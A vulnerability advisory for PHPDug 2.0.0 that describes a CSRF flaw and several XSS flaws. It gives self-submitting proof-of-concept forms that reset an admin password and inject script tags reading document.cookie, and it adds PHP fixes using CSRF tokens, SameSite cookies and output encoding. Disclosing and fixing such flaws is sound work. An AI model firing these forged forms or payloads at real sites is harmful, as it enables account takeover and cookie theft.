PHPDug: multiple vulnerabilities (CSRF, XSS)
Vulnerability description: PHPDug 2.0.0 contains a cross-site request forgery (CSRF) vulnerability and several cross-site scripting (XSS) vulnerabilities. Successful exploitation may lead to compromise of the application, disclosure or theft of cookie-based authentication credentials, or modification of sensitive data.
CSRF vulnerability: the script "admin/admin_edit.php" does not verify the origin of the HTTP request, so a state-changing POST can be submitted from any page the administrator visits while logged in. Test PoC:
<form action="http://www.myhack58.com/adm/admin_edit.php" method="post" name="main">
<input type="hidden" name="id[1]" value="USERID">
<input type="hidden" name="username[USERID]" value="Admin">
<input type="hidden" name="password[USERID]" value="test123">
<input type="hidden" name="Submit" value="Submit">
</form>
<script>
document.main.submit();
</script>
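The missing check is a synchronizer token (plus a SameSite session cookie) that the forged form above cannot supply. The following is an added example written for this page, not PHPDug's own code; the function names, the "csrf_token" form field and the session key are assumptions, and the form at the bottom mirrors the field names of the PoC only to show where the token goes.

```php
<?php
// Added example, not PHPDug's own code: a synchronizer-token check for a
// state-changing admin handler such as admin/admin_edit.php. The function
// names, the "csrf_token" field and the session key are assumptions.

// Mark the session cookie SameSite=Lax (PHP 7.3+ array form) so that a
// cross-site POST from an attacker's page is sent without the victim's
// session cookie in the first place.
session_set_cookie_params([
    'httponly' => true,
    'secure'   => true,   // assumes the site is served over HTTPS
    'samesite' => 'Lax',
]);
session_start();

// One unpredictable token per session, embedded in every form that changes state.
// The attacker's page cannot read it: the same-origin policy blocks reading
// the admin page's HTML from another origin.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// True only if the posted token equals the session token. hash_equals() is a
// constant-time comparison, so the token cannot be recovered byte by byte.
function csrf_verify(array $post, array $session): bool
{
    $posted = $post['csrf_token'] ?? '';
    $stored = $session['csrf_token'] ?? '';
    if (!is_string($posted) || $stored === '') {
        return false;
    }
    return hash_equals($stored, $posted);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_verify($_POST, $_SESSION)) {
        // The forged form in the PoC posts id[1]/username/password but no
        // token, so it ends here before any account data is touched.
        http_response_code(403);
        exit('Request rejected: missing or invalid CSRF token.');
    }
    // ... the original admin_edit.php update logic would run here ...
}
?>
<form action="admin_edit.php" method="post">
  <input type="hidden" name="csrf_token"
         value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') ?>">
  <input type="text" name="username[1]" value="">
  <input type="password" name="password[1]" value="">
  <input type="submit" name="Submit" value="Submit">
</form>
```

The token check is the primary control; the SameSite attribute is defence in depth, because older browsers ignore it and Lax still sends the cookie on top-level GET navigations, so any admin action reachable via GET would need the token as well.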
XSS vulnerabilities: user-supplied values are written back into HTML without output encoding in "add_story.php", "editprofile.php", "admin/content_add.php" and "admin/admin_edit.php". Test PoCs:
1.
<form action="http://www.myhack58.com/add_story.php" method="post" name="main">
<input type="hidden" name="story_url" value='http://www.baidu.com/"><script>alert(document.cookie)</script>'>
<input type="hidden" name="Submit" value="Continue">
</form>
<script>
document.main.submit();
</script>
2.
<form action="http://www.myhack58.com/editprofile.php" method="post" name="main">
<input type="hidden" name="email" value='email (at) example (dot) com [email concealed]"><script>alert(document.cookie)</script>'>
<input type="hidden" name="commentst" value="-4">
<input type="hidden" name="Submit" value="Save Changes">
</form>
<script>
document.main.submit();
</script>
3.
<form action="http://www.myhack58.com/adm/content_add.php" method="post" name="main">
<input type="hidden" name="id" value="999">
<input type="hidden" name="title" value='page"><script>alert(document.cookie)</script>'>
<input type="hidden" name="content" value="content">
<input type="hidden" name="Submit" value="Submit">
</form>
<script>
document.main.submit();
</script>
4.
<form action="http://www.myhack58.com/adm/admin_edit.php" method="post" name="main">
<input type="hidden" name="id[1]" value="1">
<input type="hidden" name="username[1]" value='admin<script>alert("XSS")</script>'>
<input type="hidden" name="password[1]" value="">
<input type="hidden" name="Submit" value="Submit">
</form>
<script>
document.main.submit();
</script>
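All four PoCs rely on the same defect: a value such as story_url, email, title or username is echoed into an attribute or element body unencoded, so the `">` in the payload closes the attribute and the script tag becomes live markup. The following is an added example written for this page, not PHPDug's code; the helper names and the sample values are constructed, and it shows the vulnerable echo beside a context-aware hardened form (encoding for HTML/attribute context, scheme validation for the href context).

```php
<?php
// Added example, not PHPDug's own code: context-aware output encoding for the
// user-controlled fields named in the advisory (story_url, email, title,
// username). The helper names and the sample values are constructed.

// HTML body and attribute context: encode &, <, >, " and '. ENT_QUOTES also
// encodes the single quote, so the value is inert inside single- or
// double-quoted attributes, which is exactly where the PoCs break out.
function esc(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// href context: encoding alone is not enough, because "javascript:" needs no
// special characters. Accept only URLs with an http or https scheme.
function safe_url(string $url): ?string
{
    if (filter_var($url, FILTER_VALIDATE_URL) === false) {
        return null;
    }
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    return in_array($scheme, ['http', 'https'], true) ? $url : null;
}

// email field (editprofile.php): validate the syntax before storing it at all;
// a value carrying quotes, angle brackets or spaces is not an address.
function safe_email(string $email): ?string
{
    $valid = filter_var($email, FILTER_VALIDATE_EMAIL);
    return $valid === false ? null : $valid;
}

// Constructed samples in the shape of PoC 1 and PoC 3.
$story_url = 'http://www.baidu.com/"><script>alert(document.cookie)</script>';
$title     = 'page"><script>alert(document.cookie)</script>';

// Vulnerable pattern (what the advisory describes): the value is echoed as-is.
//   echo '<a href="' . $story_url . '">' . $title . '</a>';

// Hardened pattern: validate for the href context, encode for every context.
// Even if the URL passes scheme validation, esc() turns its " and < into
// &quot; and &lt;, so the attribute can no longer be closed early.
$href = safe_url($story_url);
if ($href === null) {
    echo '<span>' . esc($title) . '</span>';
} else {
    echo '<a href="' . esc($href) . '">' . esc($title) . '</a>';
}
```

Encode at the point of output, not at input time: stored data stays as the user typed it, and each output context (HTML body, attribute, URL, JavaScript) gets the encoding that context needs. A Content-Security-Policy without `'unsafe-inline'` would additionally stop the injected inline script from executing in browsers that enforce it, but it does not replace the encoding.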